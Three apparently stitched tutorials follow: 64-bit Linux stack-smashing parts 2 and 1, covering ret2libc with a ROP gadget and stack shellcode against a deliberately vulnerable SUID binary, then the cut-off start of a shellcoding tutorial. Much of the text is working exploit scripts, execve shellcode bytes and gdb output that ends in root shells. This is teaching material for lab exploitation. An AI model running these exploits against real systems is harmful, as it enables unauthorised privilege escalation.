This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64-bit binary using a classic stack overflow and learned that we can’t just blindly expect to overwrite RIP by spamming the buffer with bytes. We turned off ASLR, NX, and stack canaries in part 1 so we could focus on the exploitation rather than bypassing these security features. This time we’ll enable NX and look at how we can exploit the same binary using ret2libc.

Setup

The setup is identical to what I was using in part 1. We’ll also be making use of the following:

Ret2Libc

Here’s the same binary we exploited in part 1. The only difference is we’ll keep NX enabled which will prevent our previous exploit from working since the stack is now non-executable:

/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

In 32-bit binaries, a ret2libc attack involves setting up a fake stack frame so that the function calls a function in libc and passes it any parameters it needs. Typically this would be returning to system() and having it execute “/bin/sh”.

In 64-bit binaries, function parameters are passed in registers, therefore there’s no need to fake a stack frame. The first six parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything beyond that is passed in the stack. This means that before returning to our function of choice in libc, we need to make sure the registers are setup correctly with the parameters the function is expecting. This in turn leads us to having to use a bit of Return Oriented Programming (ROP). If you’re not familiar with ROP, don’t worry, we won’t be going into the crazy stuff.

We’ll start with a simple exploit that returns to system() and executes “/bin/sh”. We need a few things:

  • The address of system(). ASLR is disabled so we don’t have to worry about this address changing.
  • A pointer to “/bin/sh”.
  • Since the first function parameter needs to be in RDI, we need a ROP gadget that will copy the pointer to “/bin/sh” into RDI.

Let’s start with finding the address of system(). This is easily done within gdb:

gdb-peda$ start
.
.
.
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x7ffff7a5ac40 <system>

We can just as easily search for a pointer to “/bin/sh”:

gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006ff --> 0x68732f6e69622f ('/bin/sh')
    libc : 0x7ffff7b9209b --> 0x68732f6e69622f ('/bin/sh')

The first two pointers are from the string in the binary that prints out “Try to exec /bin/sh”. The third is from libc itself, and in fact if you do have access to libc, then feel free to use it. In this case, we’ll go with the first one at 0x4006ff.

Now we need a gadget that copies 0x4006ff to RDI. We can search for one using ropper. Let’s see if we can find any instructions that use EDI or RDI:

koji@pwnbox:~/ret2libc$ ropper --file ret2libc --search "% ?di"
Gadgets
=======


0x0000000000400520: mov edi, 0x601050; jmp rax;
0x000000000040051f: pop rbp; mov edi, 0x601050; jmp rax;
0x00000000004006a3: pop rdi; ret ;

3 gadgets found

The third gadget that pops a value off the stack into RDI is perfect. We now have everything we need to construct our exploit:

#!/usr/bin/env python

from struct import *

buf = ""
buf += "A"*104                              # junk
buf += pack("<Q", 0x00000000004006a3)       # pop rdi; ret;
buf += pack("<Q", 0x4006ff)                 # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a5ac40)           # address of system()

f = open("in.txt", "w")
f.write(buf)

This exploit will write our payload into in.txt which we can redirect into the binary within gdb. Let’s go over it quickly:

  • Line 7: We overwrite RIP with the address of our ROP gadget so when vuln() returns, it executes pop rdi; ret.
  • Line 8: This value is popped into RDI when pop rdi is executed. Once that’s done, RSP will be pointing to 0x7ffff7a5ac40; the address of system().
  • Line 9: When ret executes after pop rdi, execution returns to system(). system() will look at RDI for the parameter it expects and execute it. In this case, it executes “/bin/sh”.

Let’s see it in action in gdb. We’ll set a breakpoint at vuln()’s return instruction:

gdb-peda$ br *vuln+73
Breakpoint 1 at 0x40060f

Now we’ll redirect the payload into the binary and it should hit our first breakpoint:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
.
.
.
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 --> 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)
0008| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0024| 0x7fffffffe520 --> 0x0
0032| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0040| 0x7fffffffe530 --> 0x0
0048| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0056| 0x7fffffffe540 --> 0x100000000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040060f in vuln ()

Notice that RSP points to 0x4006a3 which is our ROP gadget. Step in and we’ll return to our gadget where we can now execute pop rdi.

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
=> 0x4006a3 <__libc_csu_init+99>:   pop    rdi
   0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0016| 0x7fffffffe520 --> 0x0
0024| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0032| 0x7fffffffe530 --> 0x0
0040| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0048| 0x7fffffffe540 --> 0x100000000
0056| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a3 in __libc_csu_init ()

Step in and RDI should now contain a pointer to “/bin/sh”:

gdb-peda$ si
[----------------------------------registers-----------------------------------]
.
.
.
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
.
.
.
[-------------------------------------code-------------------------------------]
   0x40069e <__libc_csu_init+94>:   pop    r13
   0x4006a0 <__libc_csu_init+96>:   pop    r14
   0x4006a2 <__libc_csu_init+98>:   pop    r15
=> 0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
   0x4006b2:    add    BYTE PTR [rax],al
   0x4006b4 <_fini>:    sub    rsp,0x8
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0008| 0x7fffffffe520 --> 0x0
0016| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0024| 0x7fffffffe530 --> 0x0
0032| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0040| 0x7fffffffe540 --> 0x100000000
0048| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
0056| 0x7fffffffe550 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a4 in __libc_csu_init ()

Now RIP points to ret and RSP points to the address of system(). Step in again and we should now be in system()

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
   0x7ffff7a5ac35 <cancel_handler+181>: pop    rbx
   0x7ffff7a5ac36 <cancel_handler+182>: ret
   0x7ffff7a5ac37:  nop    WORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a5ac40 <system>: test   rdi,rdi
   0x7ffff7a5ac43 <system+3>:   je     0x7ffff7a5ac50 <system+16>
   0x7ffff7a5ac45 <system+5>:   jmp    0x7ffff7a5a770 <do_system>
   0x7ffff7a5ac4a <system+10>:  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7a5ac50 <system+16>:  lea    rdi,[rip+0x13744c]        # 0x7ffff7b920a3

At this point if we just continue execution we should see that “/bin/sh” is executed:

gdb-peda$ c
[New process 11114]
process 11114 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[New process 11115]
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
process 11115 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[Inferior 3 (process 11115) exited normally]
Warning: not running or target is remote

Perfect, it looks like our exploit works. Let’s try it and see if we can get a root shell. We’ll change ret2libc’s owner and permissions so that it’s SUID root:

koji@pwnbox:~/ret2libc$ sudo chown root ret2libc
koji@pwnbox:~/ret2libc$ sudo chmod 4755 ret2libc

Now let’s execute our exploit much like we did in part 1:

koji@pwnbox:~/ret2libc$ (cat in.txt ; cat) | ./ret2libc
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
whoami
root

Got our root shell again, and we bypassed NX. Now this was a relatively simple exploit that only required one parameter. What if we need more? Then we need to find more gadgets that setup the registers accordingly before returning to a function in libc. If you’re up for a challenge, rewrite the exploit so that it calls execve() instead of system(). execve() requires three parameters:

int execve(const char *filename, char *const argv[], char *const envp[]);

This means you’ll need to have RDI, RSI, and RDX populated with proper values before calling execve(). Try to use gadgets only within the binary itself, that is, don’t look for gadgets in libc.

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.

Setup

Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")
f.write(buf)

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA\220\001\n")
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RSP: 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
0008| 0x7fffffffe510 ("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%"...)
0016| 0x7fffffffe518 ("jAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA"...)
0024| 0x7fffffffe520 ("AkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%j"...)
0032| 0x7fffffffe528 ("AAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%"...)
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)
[------------------------------------------------------------------------------]

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")
f.write(buf)

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")
f.write(buf)

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
whoami
root

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

Shellcoding for Linux and Windows Tutorial

WARNING: The following text is useful as a historical and basic document on writing shellcodes.

Background Information

  • EAX, EBX, ECX, and EDX are all 32-bit General Purpose Registers on the x86 platform.
  • AH, BH, CH and DH access the upper 16-bits of the GPRs.
  • AL, BL, CL, and DL access the lower 8-bits of the GPRs.
  • ESI and EDI are used when making Linux syscalls.
  • Syscalls with 6 arguments or less are passed via the GPRs.
  • XOR EAX, EAX is a great way to zero out a register (while staying away from the nefarious NULL byte!)
  • In Windows, all function arguments are passed on the stack according to their calling convention.

 

Required Tools

  • gcc
  • ld
  • nasm
  • objdump

 

Optional Tools

  • odfhex.c — a utility created by me to extract the shellcode from «objdump -d» and turn it into escaped hex code (very useful!).
  • arwin.c — a utility created by me to find the absolute addresses of windows functions within a specified DLL.
  • shellcodetest.c — this is just a copy of the c code found  below. it is a small skeleton program to test shellcode.
  • exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm — the source code found in this document (the win32 shellcode was written with Windows XP SP1).

Linux Shellcoding

When testing shellcode, it is nice to just plop it into a program and let it run. The C program below will be used to test all of our code.


/*shellcodetest.c*/

char code[] = "bytecode will go here!";
int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}


 

Making a Quick Exit

    The easiest way to begin would be to demonstrate the exit syscall due to it’s simplicity. Here is some simple asm code to call exit. Notice the al and XOR trick to ensure that no NULL bytes will get into our code.


;exit.asm
[SECTION .text]
global _start
_start:
        xor eax, eax       ;exit is syscall 1
        mov al, 1       ;exit is syscall 1
        xor ebx,ebx     ;zero out ebx
        int 0x80



Take the following steps to compile and extract the byte code.
steve hanna@1337b0x:~$ nasm -f elf exit.asm
steve hanna@1337b0x:~$ ld -o exiter exit.o
steve hanna@1337b0x:~$ objdump -d exiter

exiter:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       b0 01                   mov    $0x1,%al
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       cd 80                   int    $0x80

The bytes we need are b0 01 31 db cd 80.

Replace the code at the top with:
char code[] = «\xb0\x01\x31\xdb\xcd\x80»;

Now, run the program. We have a successful piece of shellcode! One can strace the program to ensure that it is calling exit.

Saying Hello

For this next piece, let’s ease our way into something useful. In this block of code one will find an example on how to load the address of a string in a piece of our code at runtime. This is important because while running shellcode in an unknown environment, the address of the string will be unknown because the program is not running in its normal address space.


;hello.asm
[SECTION .text]

global _start


_start:

        jmp short ender

        starter:

        xor eax, eax    ;clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx

        mov al, 4       ;syscall write
        mov bl, 1       ;stdout is 1
        pop ecx         ;get the address of the string from the stack
        mov dl, 5       ;length of the string
        int 0x80

        xor eax, eax
        mov al, 1       ;exit the shellcode
        xor ebx,ebx
        int 0x80

        ender:
        call starter	;put the address of the string on the stack
        db 'hello'


 

steve hanna@1337b0x:~$ nasm -f elf hello.asm
steve hanna@1337b0x:~$ ld -o hello hello.o
steve hanna@1337b0x:~$ objdump -d hello

hello:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 19                   jmp    804809b 

08048082 <starter>:
 8048082:       31 c0                   xor    %eax,%eax
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       31 c9                   xor    %ecx,%ecx
 804808a:       b0 04                   mov    $0x4,%al
 804808c:       b3 01                   mov    $0x1,%bl
 804808e:       59                      pop    %ecx
 804808f:       b2 05                   mov    $0x5,%dl
 8048091:       cd 80                   int    $0x80
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       b0 01                   mov    $0x1,%al
 8048097:       31 db                   xor    %ebx,%ebx
 8048099:       cd 80                   int    $0x80

0804809b <ender>:
 804809b:       e8 e2 ff ff ff          call   8048082 
 80480a0:       68 65 6c 6c 6f          push   $0x6f6c6c65


Replace the code at the top with:
char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\
